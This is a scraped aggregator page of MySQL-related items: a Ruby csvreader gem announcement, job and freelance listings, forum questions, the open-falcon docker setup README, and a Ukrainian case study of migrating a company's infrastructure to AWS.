Next Page: 10000

          csvreader v1.0 - read comma-separated values (csv) the right way (incl. hash, ...)       Cache   Translate Page      
Hello, I’ve uploaded version 1.0 of the new comma-separated values csvreader library / gem that lets you read tabular data in the comma-separated values (csv) format the right way :-), that is, the basic methods such as Csv.read or CsvHash.read use best practices out-of-the-box with zero-configuration. Under the hood the new library includes purpose-built “backend” parsers (e.g. ParserStd, ParserStrict, ParserTab, etc.) so you can handle all the popular comma-separated values (csv) formats / dialects such as MySQL (use Csv.mysql.read) or PostgreSQL (use Csv.postgres.read) exports and more using unix-style escapes and \N or unquoted empty values for null/nil and so on. Data is the new gold :-) Happy data / gold mining with the new csvreader library / gem (in ruby). Cheers. Prost. PS: What’s wrong (broken) in the standard csv library? See the let’s count the ways article series.

          Atomic Transactional Replacement of a Table in MySQL      Cache   Translate Page      
Even with AUTOCOMMIT off a DROP TABLE or CREATE TABLE statement will cause an implicit commit in MySQL. So if you drop your table of (say) aggregated data and then create a new one even if you’re theoretically in a transaction there will be time when clients of the database see no table and time …
          Универсальный RestFull API для СУБД на nodeJS      Cache   Translate Page      
Проблематика: Есть сервер с СУБД, например MySQL. Для управления данными в таблицах необходимо реализовать полный RestFull API интерфейс на nodeJS для каждой таблицы: POST — новая запись PUT — редактировать запись с конкретным id GET — получить все записи GET — получить запись с конкретным id DELETE — удалить запись с конкретным id Очень много […]
          Display certain records from year field (integer)      Cache   Translate Page      
Forum: MySQL Posted By: docock Post Time: Oct 7th, 2018 at 03:59 PM
          Displaying MySQL data in two different divs help      Cache   Translate Page      
Forum: PHP Posted By: joshm101 Post Time: Oct 7th, 2018 at 06:09 AM
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Querying MySQL’s INFORMATION SCHEMA: Why? How?      Cache   Translate Page      
Databases need to run optimally, but that’s not such an easy task. The INFORMATION SCHEMA database can be your secret weapon in the war of database optimization.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Migration Developer (PHP, MySQL) - Vanilla Forums, Inc. - Montréal, QC      Cache   Translate Page      
We offer a casual work environment, health benefits, Mac gear, free snacks and a job that you’ll love!...
From Indeed - Tue, 09 Oct 2018 18:46:53 GMT - View all Montréal, QC jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          falcon-plus/README.md at master · open-falcon/falcon-plus · GitHub      Cache   Translate Page      

Running open-falcon container

the latest version in docker hub is v0.2.1

1. Start mysql and init the mysql table before the first running
    ## start mysql in container
    docker run -itd \
        --name falcon-mysql \
        -v /home/work/mysql-data:/var/lib/mysql \
        -e MYSQL_ROOT_PASSWORD=test123456 \
        -p 3306:3306 \
        mysql:5.7

    ## init mysql table before the first running
    cd /tmp && \
    git clone https://github.com/open-falcon/falcon-plus && \
    cd /tmp/falcon-plus/ && \
    for x in `ls ./scripts/mysql/db_schema/*.sql`; do
        echo init mysql table $x ...;
        docker exec -i falcon-mysql mysql -uroot -ptest123456 < $x;
    done

    rm -rf /tmp/falcon-plus/
2. Start redis in container
docker run --name falcon-redis -p6379:6379 -d redis:4-alpine3.8
3. Start falcon-plus modules in one container
    ## pull images from hub.docker.com/openfalcon
    docker pull openfalcon/falcon-plus:v0.2.1
    
    ## run falcon-plus container
    docker run -itd --name falcon-plus \
         --link=falcon-mysql:db.falcon \
         --link=falcon-redis:redis.falcon \
         -p 8433:8433 \
         -p 8080:8080 \
         -e MYSQL_PORT=root:test123456@tcp\(db.falcon:3306\) \
         -e REDIS_PORT=redis.falcon:6379  \
         -v /home/work/open-falcon/data:/open-falcon/data \
         -v /home/work/open-falcon/logs:/open-falcon/logs \
         openfalcon/falcon-plus:v0.2.1
    
    ## start falcon backend modules, such as graph,api,etc.
    docker exec falcon-plus sh ctrl.sh start \
            graph hbs judge transfer nodata aggregator agent gateway api alarm
    
    ## or you can just start/stop/restart specific module as: 
    docker exec falcon-plus sh ctrl.sh start/stop/restart xxx

    ## check status of backend modules
    docker exec falcon-plus ./open-falcon check
    
    ## or you can check logs at /home/work/open-falcon/logs/ in your host
    ls -l /home/work/open-falcon/logs/
    
4. Start falcon-dashboard in container
    docker run -itd --name falcon-dashboard \
        -p 8081:8081 \
        --link=falcon-mysql:db.falcon \
        --link=falcon-plus:api.falcon \
        -e API_ADDR=http://api.falcon:8080/api/v1 \
        -e PORTAL_DB_HOST=db.falcon \
        -e PORTAL_DB_PORT=3306 \
        -e PORTAL_DB_USER=root \
        -e PORTAL_DB_PASS=test123456 \
        -e PORTAL_DB_NAME=falcon_portal \
        -e ALARM_DB_HOST=db.falcon \
        -e ALARM_DB_PORT=3306 \
        -e ALARM_DB_USER=root \
        -e ALARM_DB_PASS=test123456 \
        -e ALARM_DB_NAME=alarms \
        -w /open-falcon/dashboard openfalcon/falcon-dashboard:v0.2.1  \
       './control startfg'

Building open-falcon images from source code

Building falcon-plus
    cd /tmp && \
    git clone https://github.com/open-falcon/falcon-plus && \
    cd /tmp/falcon-plus/ && \
    docker build -t falcon-plus:v0.2.1 .
Building falcon-dashboard
    cd /tmp && \
    git clone https://github.com/open-falcon/dashboard  && \
    cd /tmp/dashboard/ && \
    docker build -t falcon-dashboard:v0.2.1 .

          i Need update my offline payment module for Prestashop error 500      Cache   Translate Page      
I need fix this module, and add few options, this Module stop working with new site, since was for previous version. i want incorpore this option and few more options. we can work here and thru skype/dropbox/email/phone if speak spanish is good option also... (Budget: $30 - $250 USD, Jobs: eCommerce, HTML, MySQL, PHP, Prestashop)
          Как научить MySQL заглядывать в прошлое      Cache   Translate Page      
Как научить MySQL заглядывать в прошлое#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

В статье речь пойдёт о протоколировании изменений в MySQL. Хочу показать реализацию протоколирования на триггерах и то, какие удивительные вещи можно будет с этим делать.

Почему на триггерах? Потому что нет доступа к бинарному логу. Реализация с бинарным логом потенциально более производительная, хотя и более сложная в разработке, т.к. требуется парсить лог.

Сразу хочу предупредить, что данный метод создаст дополнительную нагрузку на сервер. И если у Вас активно изменяющиеся данные, то данное решение может не подойти Вам или будет требовать некоторых корректировок и доработок.

В целом же решение является законченным и комплексным. Может быть внедрено «как есть» и прекрасно справляться со своей задачей.
Читать дальше →
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          i Need update my offline payment module for Prestashop error 500      Cache   Translate Page      
I need fix this module, and add few options, this Module stop working with new site, since was for previous version. i want incorpore this option and few more options. we can work here and thru skype/dropbox/email/phone if speak spanish is good option also... (Budget: $30 - $250 USD, Jobs: eCommerce, HTML, MySQL, PHP, Prestashop)
          No me actualiza los registros      Cache   Translate Page      

No me actualiza los registros

Respuesta a No me actualiza los registros

Buenas: He trabajado con mysql y no tengo experiencia alguna con sqlserver. De todas formas, veo que has agregado el idproducto como un parametro de salida:
...
ParIdproducto.Direction = ParameterDirection.Output;
....
Quizás se te ha pasado y sea ese el problema. Quizá estas utilizando un return 1 para cuando se realiza la actualización pero tienes el id del producto como salida. Igualmente, no conozco sqlserver y en mysql solo trabajo con parametros de entrada.

Publicado el 09 de Octubre del 2018 por Fabricio

          Need Email Server Expert      Cache   Translate Page      
I have a Sendy license and need help with a few things, including updating the version, setting a cron job and general maintenance issues that come up from time to time. I'm looking for someone who has... (Budget: $5 - $15 USD, Jobs: Email Marketing, Interspire, Mailwizz, MySQL, System Admin)
          Laravel expret      Cache   Translate Page      
we have site need to be made some changes: 1) spread the admin panel to one domain and the fronted to another domain. for example: login.com will be the login area and admin panel and website.com will show the results... (Budget: $200 - $455 USD, Jobs: Laravel, MySQL, PHP, Software Architecture, Website Design)
          Database Architect with Nosql, Mysql and python      Cache   Translate Page      
TX-Austin, Hi, Greetings, Hope you are doing great, please find the job description below and reply with your updated resume asap. Title: Data Architect Location: Austin, TX Duration: 12+ months contract Required Qualifications 12+ years of experience as a data developer for web-based large-scale enterprise applications. Developed and supported large-scale enterprise databases in production based on SQL (Mar
          Mulesoft developer      Cache   Translate Page      
IN-Indianapolis, Position- Mulesoft Developer Location- Indianapolis IN Dutation- Long Term contract Mulesoft Consultant with 10+ Years of experience. Mule Batch, JMS,CXF Webservices, SOAP and Rest Web Services, Java, MySQL, MULEESB, Any point Studio, Mule server 3.8.0, MMC, Jenkins, JIRA, Confluence, Kibana, Git Hub, ForgeRock, Java8, Spring, Munit, Active MQ
          Як ми робили проект з digital transformation, або Про розуміння клієнта      Cache   Translate Page      

Мабуть, я не відкрию великої таємниці, якщо скажу: коли вам обіцяють, що проект простий і ви тихенько зробите його за три місяці, не вірте. Краще множте терміни у 3-5 разів. Запасайте декалітри кави. Набирайтесь терпіння. Готуйтеся до пригод із документацією. Якщо обіцянки справдяться, то раніше відпочинете. А як ні — будете морально загартовані.

Отже, я працюю System Architect у EPAM Ukraine. Нещодавно ми успішно завершили проект з digital transformation однієї голландської компанії. Як ви вже, певно, здогадалися з попереднього абзацу, «успішно» не означає «просто». Розкажу, як ми допомогали трансформувати бізнес і міксували DevOps best practices з мистецтвом комунікацій.

Передісторія

Наш замовник — B2B-постачальник повнофункціональних метеорологічних рішень. Простіше кажучи, вони продають опрацьовані метеорологічні дані, в тому числі у вигляді гарних картинок, які ми потім дивимося у прогнозах на ТБ.

Спочатку було три різні компанії у трьох різних країнах. Потім голландці забрали дві інші під своє крило. І вже тоді встигли створити собі задачку на майбутнє. Головна компанія не стала перебудовувати інфраструктуру своїх надбань і залишила її, як є. Так само, як і людей. Новоутворений холдинг став схожий на клаптикову ковдру, де кожен шматок займався чимось своїм, а з іншими скріплявся грубими стібками. Через це, звичайно, виникало багато проблем із міграцією даних. Зокрема, з тією швейцарською компанією, яка згодом потрапила до нас у вигляді проекту.

Система підрозділу, який відповідав за збір метеорологічних даних, дуже складна. У їхню інфраструктуру потрапляють необроблені дані відразу з п’яти потоків. А три різні бази даних інфраструктури, до прикладу, були підключені до одного програмного забезпечення, яке в свою чергу підключене до іншого.

Дата-центр підрозділу обробляє сирі дані та розподіляє їх на два окремих продукти: дані з малюнками та анімацією, що продаються клієнтам, та відео із прогнозом погоди. А ще ж є показники, які отримують із супутників та метеорологічних станцій.

Справа в тому, що навіть після юридичного об’єднання ця підкомпанія продовжувала жити своїм життям. Вони розміщували інфраструктуру в дата-центрі буквально навпроти офісу, причому за шалені гроші. Тільки ISP коштував компанії сотні тисяч євро. А щомісячна плата складала десятки тисяч євро плюс додаткові витрати на його підтримку.

Життя новоутворених холдингів бентежне, але бізнес є бізнес. І наш майбутній замовник вирішив, що хоче не просто продавати метеорологічні дані, а створювати круті продукти на їхній основі. Наприклад, уточнювати та гіперлокалізувати прогнози до масштабу майже 2 на 2 км. Але перш ніж братися за інновації, необхідно було укріпити тили і навести лад у back-end. Для цього CTO замовника запустив програму Cost Saving. Її мета — через вихід у хмару відмовитися від інфраструктури, розкиданої по різних дата-центрах і зекономити кількасот тисяч доларів на рік. Причому то мав бути не лише перенос, а і грамотна оптимізація. Із цією задачкою вони прийшли в EPAM.

Неприємні сюрпризи

Проект потрапив до мене як терміновий. З клієнтом уже були попередні домовленості, залишалося розставити крапки над «і» та починати працювати.

Спочатку на проект виділили три місяці. Я поїхав до замовника, і його CTO відразу мене заспокоїв: «Не переживай, у нас кейс простий. Є дорогий дата-центр у Швейцарії, і нам треба швиденько перенести все, що там є, у клауд і таким чином зрізати кости». Він називав це «shift & lift». Я зрадів, але сказав: «Давайте подивимось». І почав дивитися.

Тут почалися сюрпризи.

З невідомих нам причин стейкхолдери почали залишати швейцарський дата-центр, у якому вони працювали і в якому утримувався шматок компанії. Пішов і CTO, замість нього взяли нову людину, яка тільки переймала справи. Переносити інфраструктуру без тестування було неможливо. Обіцяний «shift & lift» залишився у моїх мріях — людей, які могли щось розповісти, ставало все менше. До того ж нас чекав цілий букет із старого заліза, legacy-систем та рішень.

Оцінивши ситуацію, я зрозумів, що в три місяці ми не вкладемося. Зібрав команду із 7 людей. Ми по маленьких шматочках почали збирати інформацію щодо організації інфраструктури і вибудували часткову структуру. Але зіштовхнулися з однією великою проблемою — монолітністю: варто відключити один сервіс, помирають усі інші.

Щоб зрозуміти, що коїться із сервісами, необхідно було зрозуміти, звідки почати. Ми довго крутилися, зняли снепшоти з усіх існуючих машин, намагалися збагнути, що і як працює всередині, але даремно. Люди, які могли щось пояснити, то звільнялися, то йшли у відпустку або мало відповідали.

Ми зрозуміли, що чекати допомоги немає звідки. Треба було робити повний реверс інжиніринг.

Пробиваючи стіни

Через людський фактор ми мали найбільше веселощів. Так як у компанії офіційно оголосили digital transformation, у якому наш проект брав участь, люди думали, что їх просто звільнять після закінчення. І хоча насправді це було не так, ми скрізь натрапляли на «лежачих поліцейських».

У клієнта дуже багато всілякого legacy staff, який вони так і не мігрували у хмару та не автоматизували. Команда, яка займається data flow і сидить на всіх цих legacy, прекрасно розуміла, що ми можемо автоматизувати все, що вони нині роблять руками. І вони стануть просто не потрібні. Хоча в нас і в планах такого не було.

З командою operations виникали інші нюанси. Там є люди, які працюють багато років. І вони не дуже хотіли переїжджати на новий стек технологій Amazon, бо не особливо з ним знайомі. У них у дата-центрі кілька машин працювало на старому Oracle, і перемігрувати його на Amazon повністю вони не захотіли. Мовляв, хай буде, як є. Причина — «тому що ні».

Такий супротив ми зустрічали практично в кожному департаменті, поки не показували, як після міграції все автоматично працює. Врешті-решт, з усіма структурами це допомогло.

Інша причина — був окремий вендор, який займався виключно підтримкою Oracle. Замовник передав їм інструкцію, що необхідно зробити, щоб перенести Oracle. А фактично все зробили ми: підготували машину, засетапили, зробили в Amazon усі правила. Єдине, що зробили люди вендора — інсталювали Oracle и перенесли туди дані. На листування із вендором з поясненнями та переконаннями ми витратили в цілому близько чотирьох місяців.

Останню стінку ми пробивали лобом уже безпосередньо перед закінченням проекту, коли його треба було продовжити, щоб нормально закінчити та передати. Для цього нам дали ще одну частину інфраструктури. Це називалося broadcasting — коли картинки накладаються шарами один на інший, і завдяки даним повністю вимальовується прогноз погоди. На цьому етапі проект виглядав безхмарним, а ми були налаштовані оптимістично. Проблем ми не очікували, адже спілкувалися із knowledge keeper, який охоче ділився інформацією та обіцяв невдовзі передати всі необхідні дані.

Та скоро наш оптимізм погас. Knowledge keeper став невловим Джо, а обіцяні дані ми так і не отримали. Наша команда намагалася заходити з різних сторін, щоб отримати необхідну інформацію, якої не вистачало, та наші спроби розбила перевантаженість замовника. Як результат, фейлили дедлайни. Врешті, ми передали цю частину проекту фактично та практично готовою, але не переключеною до кінця в продакшин.

Смішно, але тут ми знову зустрілися з вендором по Oracle. Незважаючи на те, що один раз ми їх уже «перемогли», історія повторилася. Уявіть собі e-mail thread на 4-5 моніторів (у згорнутому виді). Отакий у нас був діалог по маленькій справі. Але ми люди терплячі, розуміли, що працюємо з різними людьми. І повільно, але впевнено все це рухали.

3 -> 6 -> 15

Ми поділили команду на шари: хтось займається скриптами, хтось — даними, хтось — потоками. Щоб покрити ризики всередині хоча б нашої команди, ми робили свої внутрішні сесії, де ділилися один з одним, хто що знає, як що працює. І все документували. Це допомогло підстраховувати один одного, коли хтось ішов у відпустку або був відсутній за сімейними обставинами.

Урешті-решт, ми знайшли, куди йдуть дані, і з цієї ниточки почали «розслідування». Оскільки компанія заробляє на постачанні консолідованих і оброблених даних, наша команда розбиралася саме з data flow. На цьому етапі було дуже важливо показати клієнту, що в нас є експертиза, що ми можемо з цим розібратися (до речі, за рахунок досвіду команда наша була в два рази менше, ніж та, яку зазвичай будують на таких проектах).

Коли ми повністю розібрали топологію мережі і те, що коїться в їхньому швейцарському дата-центрі, клієнт нам повірив.

Я одразу говорив, що це не буде просто і забере мінімум рік. Завжди давав апдейти, ходив на transformation-мітинги до клієнта. Розповідав усе, як є. Тому нам подовжували проект. Початковий контракт збільшили до півроку, а потім одразу ще на півроку.

Технології

Для Infrastructure-as-a-Code ми використовували SparkIFormation, для automated provisioning (CM) — Puppet, тому що він уже був присутній, але працював лише для створення юзерів і не був допрацьований у тому масштабі, щоб його можна було використовувати повноцінно.

Для моніторингу ми використовували Icinga. Для трекання карток беклогів — Trello плюс Confluence для зберігання даних та knowledge transfer. Для деплойментів — Jenkins та Bamboo. Бази даних у них були MySQL, ми перенесли їх в Amazon RDS. Також був Oracle, який ми теж перенесли та автоматизували (не без пригод, як я згадував трохи вище).

Результати

Проект закінчено у серпні. Ми переключили все на структуру Amazon. Повністю автоматизували все в DevOps best practices. Зробили повний reverse engineering до рівня бібліотек. Перемістили та перейшли на AWS, впровадили сучасний технологічний потік, зменшили ризики інфраструктури. Зробили так, як початково і хотів замовник: однією кнопкою все (або частина інфраструктури) піднімається та опускається. Ми залишили Disaster recovery plan, все задокументували і зробили knowledge transfer сесії.

Як я казав вище, за старий дата-центр компанія платила десятки тисяч євро на місяць плюс додаткові ресурси на підтримку. Після виходу в продакшн через півроку клієнт почне окупати інвестиції. Нам вдалося скоротити витрати в чотири рази. Також клієнт забув про головний біль мануальної роботи.

У цьому проекті величезну роль відіграла вся наша команда. І те, що ми всі разом працювали як один злагоджений механізм, дало нам можливість досягнути результатів, про які я зараз розповідаю. Не відкрию велику таємницю, коли скажу, що над командою теж треба працювати — створювати комфортні умови, ділитися знаннями, давати повне розуміння ситуації та підтримувати і мотивувати. Те ж саме треба вибудовувати і в стосунках із клієнтом. У нашій ситуації дуже важливо було знайти взаєморозуміння з клієнтом, а з самого початку це було достатньо складно. До нас приглядались, мовчали, говорили: «Ну, може бути». Треба було показувати результат, причому дуже хороший.

Один головний висновок

Треба зрозуміти клієнта.

Поділюся своїми трьома порадами у роботі з клієнтами, які я виніс з цього проекту:

1. Ставте себе на місце клієнта

Причому треба зрозуміти саме того клієнтського представника, з яким працюєш безпосередньо — власну точку контакту. Щоб побудувати з ним комунікаційний місток, треба зазирнути в його професійні бажання та страхи. А для повної картини — спілкуватися з людьми, які працюють у цій компанії. Це може звучати банально, але іноді банальностей треба просто дотримуватися — така собі дисципліна комунікацій, яка, як на мене, ні одній команді ще не зашкодила.

2. Дослідіть бізнес клієнта та слідкуйте за змінами

Треба розуміти всі процеси компанії, щоб зрозуміти, чому сталося саме так, хто винний і що робити. Іноді необхідно охопити значно ширші області. Наприклад, оцінити глобальне місце компанії на ринку, стан акцій, нещодавні угоди, загальне інформаційне поле. Можливо, це дасть підказки, які важелі саме зараз дадуть результат.

3. Інтегруйтесь у команду клієнта по максимуму

Щоб зрозуміти, що коїться з компанією-клієнтом, я спілкувався з різними менеджерами, які мали відношення до акаунту. Розпитував, знаходив кінці, вибудовував ланцюжки. Спілкувався з делівері-менеджером — він давав багато підказок, з ким як говорити, з ким можна, з ким не варто. Спілкувався із сусідньою командою сапорту і підтягнув її, щоб мотивувати її і їм було веселіше. Якщо зовсім чесно, ми з початку намагалися врахувати ризики, коли ми завершимо проект. Так і вийшло: ми пішли, а knowledge keepers залишилися, бо були залучені в цей процес.


Наостанок наголошу — communication skill дуже допомагає. Треба думати, розвиватися і дивитися ширше. Це бажано, якщо ви плануєте рости професійно. І абсолютно необхідно, якщо вже займаєте якусь координаційну роль у команді чи проекті. У такому випадку всі ниточки мають бути у вас у кулаці.


           ORACLE Information InDepth MySQL Edition Newsletter veröffentlicht      Cache   Translate Page      
Der neue aktuelle ORACLE Information InDepth  MySQL Edition Newsletter ist erschienen.

More:
https://www.oracle.com/a/ocom/docs/dc/em/nsl100749618-ww-ww-nl-cnl1-nsl1-ev.html?elq_mid=124914&sh=2419091808071826130709182225291704101833&cmid=MSQL180904P00021
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Build me a website      Cache   Translate Page      
Need a complete web application which will run on our companies intranet. Requirements: - Login Panel - Forms - Generate PDFs as soon as forms are submitted Connect for further details. (Budget: ₹37500 - ₹75000 INR, Jobs: Django, Laravel, MySQL, node.js, PHP)
          Mulesoft developer      Cache   Translate Page      
IN-Indianapolis, Position- Mulesoft Developer Location- Indianapolis IN Dutation- Long Term contract Mulesoft Consultant with 10+ Years of experience. Mule Batch, JMS,CXF Webservices, SOAP and Rest Web Services, Java, MySQL, MULEESB, Any point Studio, Mule server 3.8.0, MMC, Jenkins, JIRA, Confluence, Kibana, Git Hub, ForgeRock, Java8, Spring, Munit, Active MQ
          Emails being sent to customers who are in the mysql?      Cache   Translate Page      

How do you do it, so that emails get auto sent to customers at certain intervals (GDPR allowing)?

Their names and addresses would have been entered into the sql when they signed up as a customer.

Also, how do I add names and addresses manually to that sql db as well please?


          restore website from archive      Cache   Translate Page      
lost my whole website had to use static page scraping from waybackmachine need help (Budget: $10 - $30 USD, Jobs: HTML, MySQL, PHP, Web Scraping, Website Design)
          Analytics Architect - GoDaddy - Kirkland, WA      Cache   Translate Page      
Implementation and tuning experience in the big data Ecosystem (Amazon EMR, Hadoop, Spark, R, Presto, Hive), database (Oracle, mysql, postgres, Microsoft SQL...
From GoDaddy - Tue, 07 Aug 2018 03:04:25 GMT - View all Kirkland, WA jobs
          Как научить MySQL заглядывать в прошлое      Cache   Translate Page      
Как научить MySQL заглядывать в прошлое#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

В статье речь пойдёт о протоколировании изменений в MySQL. Хочу показать реализацию протоколирования на триггерах и то, какие удивительные вещи можно будет с этим делать.

Почему на триггерах? Потому что нет доступа к бинарному логу. Реализация с бинарным логом потенциально более производительная, хотя и более сложная в разработке, т.к. требуется парсить лог.

Сразу хочу предупредить, что данный метод создаст дополнительную нагрузку на сервер. И если у Вас активно изменяющиеся данные, то данное решение может не подойти Вам или будет требовать некоторых корректировок и доработок.

В целом же решение является законченным и комплексным. Может быть внедрено «как есть» и прекрасно справляться со своей задачей.
Читать дальше →
          Migrate and configure for google cloud server + Optimize the speed of the site through the code.      Cache   Translate Page      
1 - Migrate and configure for google cloud server. 2 - Optimize the speed of the site through the code. (Budget: $30 - $250 USD, Jobs: CSS3, Javascript, MySQL, PHP, WordPress)
          restore website from archive      Cache   Translate Page      
lost my whole website had to use static page scraping from waybackmachine need help (Budget: $10 - $30 USD, Jobs: HTML, MySQL, PHP, Web Scraping, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL sum函数      Cache   Translate Page      
据说sum求和如果字段是浮点型,结果会出现很多位小数的情况,但是我测试发现如果设置了字段精度比如double(12,2)无论我怎么sum也不会出现结果是超过两位小数的比如12.2222266这样子,都是12.22还是说这种超出精度范围的情况是随机的?
          MYSQL 这个语句该怎么写      Cache   Translate Page      
mysql> select * from tt; +----------+------------+----------+ | dt       | r          | w        | +----------+------------+----------+ | 20180919 | 1208500446 | 13692646 | | 20180920 | 1211483781 | 13745692 | | 20180921 | 1214659790 | 14949026 | | 20180922 | 1217073551 | 14980971 | ...
          Is it considered a bad practice to add fields to the Symfony entity in the contr ...      Cache   Translate Page      

Is it considered a bad practice to add fields to Symfony entity in controller? For example lets say that I have a simple entity:

/** * @ORM\Entity * @ORM\Table(name="user") */ class User extends BaseUser { /** * @ORM\Id * @ORM\Column(type="integer") * @ORM\GeneratedValue(strategy="AUTO") */ protected $id; public function __construct() { parent::__construct(); } public function getId() { return $this->id; } public function setId($id) { $this->id = $id; } }

And then in UserController.php I want to do the following:

foreach($users as $user){ $user->postsCount = someMethodThatWillCountPosts(); }

So later that postsCount can be displayed in Twig. Is it a bad practice?

Edit:

It's important to count posts on side of mysql database, there will be more than 50.000 elements to count for each user.

Edit2:

Please take a note that this questions is not about some particular problem but rather about good and bad practices in object oriented programming in Symfony.

"rather about good and bad practices in object oriented programming"

If that's the case then you really shouldn't have any business logic in controller, you should move this to services.

So if you need to do something with entities before passing them to twig template you might want to do that in specific service or have a custom repository class that does that (maybe using some other service class) before returning the results.

i.e. then your controller's action could look more like that:

public function someAction() { //using custom repository $users = $this->usersRepo->getWithPostCount() //or using some other service //$users = $this->usersFormatter->getWithPostCount(x) return $this->render('SomeBundle:Default:index.html.twig', [ users => $users ]); }

It's really up to you how you're going to do it, the main point to take here is that best practices rather discourage from having any biz logic in controller . Just imagine you'll need to do the same thing in another controller, or yet some other service. If you don't encapsulate it in it's own service then you'll need to write it every single time.

btw. have a read there: http://symfony.com/doc/current/best_practices/index.html


          The result of MySQL results in the php table      Cache   Translate Page      
Print the php table with the print function via the printer

I have the following php table, how do i add print functionality just to the php table? And a button that when clicked, the following table is printed via printer, I tried 'CTRL+P' and I only got the html secton of the page example the header, footer

Read the results of a PHP table, in real time with javascript

I certainly can't solve this problem by myself after a few many days already trying. This is the problem: We need to display information on the screen (HTML) that is being generated in real time inside a PHP file. The PHP is performing a very active

In the php table, retrieve all rows from the mysql database in the single td table?

in php array fetch all rowsfrom mysql database and all values are showing into the single table td? i Want results like this? 1) Small 2) Large 3) Medium now problem is that all values displaying into single table td i want to display all of these va

mysql-query other condition of the PHP table

I have this table in mysql called safespot +---------+---------------+ | term_id | userid | safe | +---------+--------|------+ | 1 | 1 | large number, unix timestamp here | 1 | 2 | large number, unix timestamp here | 1 | 3 | large number, unix timest

layout of the grid of the php table

I wanted to fetch data inside PHP table in grid layout. So I made this code. I don't know what went wrong or if I am missing something. I wanted the table to have three columns but it shows the table in a single column. Any help will be appreciated.

to sort the data of the line in the PHP table?

i have a table being echo'd from a single query to a table in our database and i get it to echo out the following table; http://www.skulldogs.com/dev/testview.php i want it to sort the "yellow" rows under the correct green rows where the "m

Change the php table when the user check a box

I have a column that has a button that when pressed, links to a URL set in PHP. I want to add a checkbox next to that button so that if it's checked when a user presses the button, it will take them to an alternate url. The PHP code setting the url:

Sum of columns in the PHP table

I have an index.php with various SQL queries which helps me find the balances of the respective accounts. This is a TRIAL BALANCE so I need to SUM all the amount in the Debit Column and SUM all the amount in the Credit Column so that I can Tally both

Mysql Query with two php tables

I was wondering how to do a query with two tables in php? I have this single query ?php $sQuery = "Select * From tb_columnas Where col_Status='activo' Order by col_ID DESC"; $result = mysql_query($sQuery, $cnxMySQL) or die(mysql_error()); $rows_

How to extract specific data from the MySQL database to my PHP table?

I want to fetch data from MySQL database to my table in .php file. In every row of my table I want to display title, text and attachment($name) that user can download. The problem is when I display that, I get all attachments from database shown in l

Adding the DateDiff column to the PHP table using MySQLI

I'm trying to add a column to my database table that shows the difference between the timestamp and the current date. I've tried creating another query using DateDiff, but I'm not sure exactly what I'm doing wrong. Can anyone help? My code is below.

The data output of the PHP table does not maintain the structure

So I have a mySQL database, and I'm using PHP to grab it and display it in a HTML table. It's set up like this: <table> <tr> <td>Title 1</td> <td>Title 2</td> </tr> <?php $i=0; while ($i < $num) { $col1=mysq

Show columns with rows in the php table

Hey guys I need your help, I have this table and I want to shows like this FIDDLE, really I don't know how to do this because sometimes just exist two columns(prov_name ) and sometimes exist more that two rows please help me if you can ! Hope you und

Automatically generate field names from the PHP table

There is a problem of automatically retrieving field names from a MySQL table. If possible could the name be placed in this format along with the dynamically created text box? : The codes that I have created so far are located below: <?php include &quo


          MySql &sol; PHP SUM 2 tables 1 query      Cache   Translate Page      

I have been having the most difficult time ever with this problem. I have 2 tables with total columns that I want to SUM together. They both have the same columns, I am using two tables as one is a script generated table of data and the other is user entered data and we need them separate. Except now we need to SUM(total) them together.

Table 1 +-----------+-----+--------+------+ | date |t_id | t_port | total| +-----------+-----+--------+------+ |2012-04-01 | 1271| 101 | 80.00| +-----------+-----+--------+------+ Table 2 +----------+------+--------+-------+ | date | t_id | t_port | total | +----------+------+--------+-------+ |2012-04-20| 1271 | 101 | 120.00| +----------+------+--------+-------+

Total should be $200.00

HERE IS MY QUERY

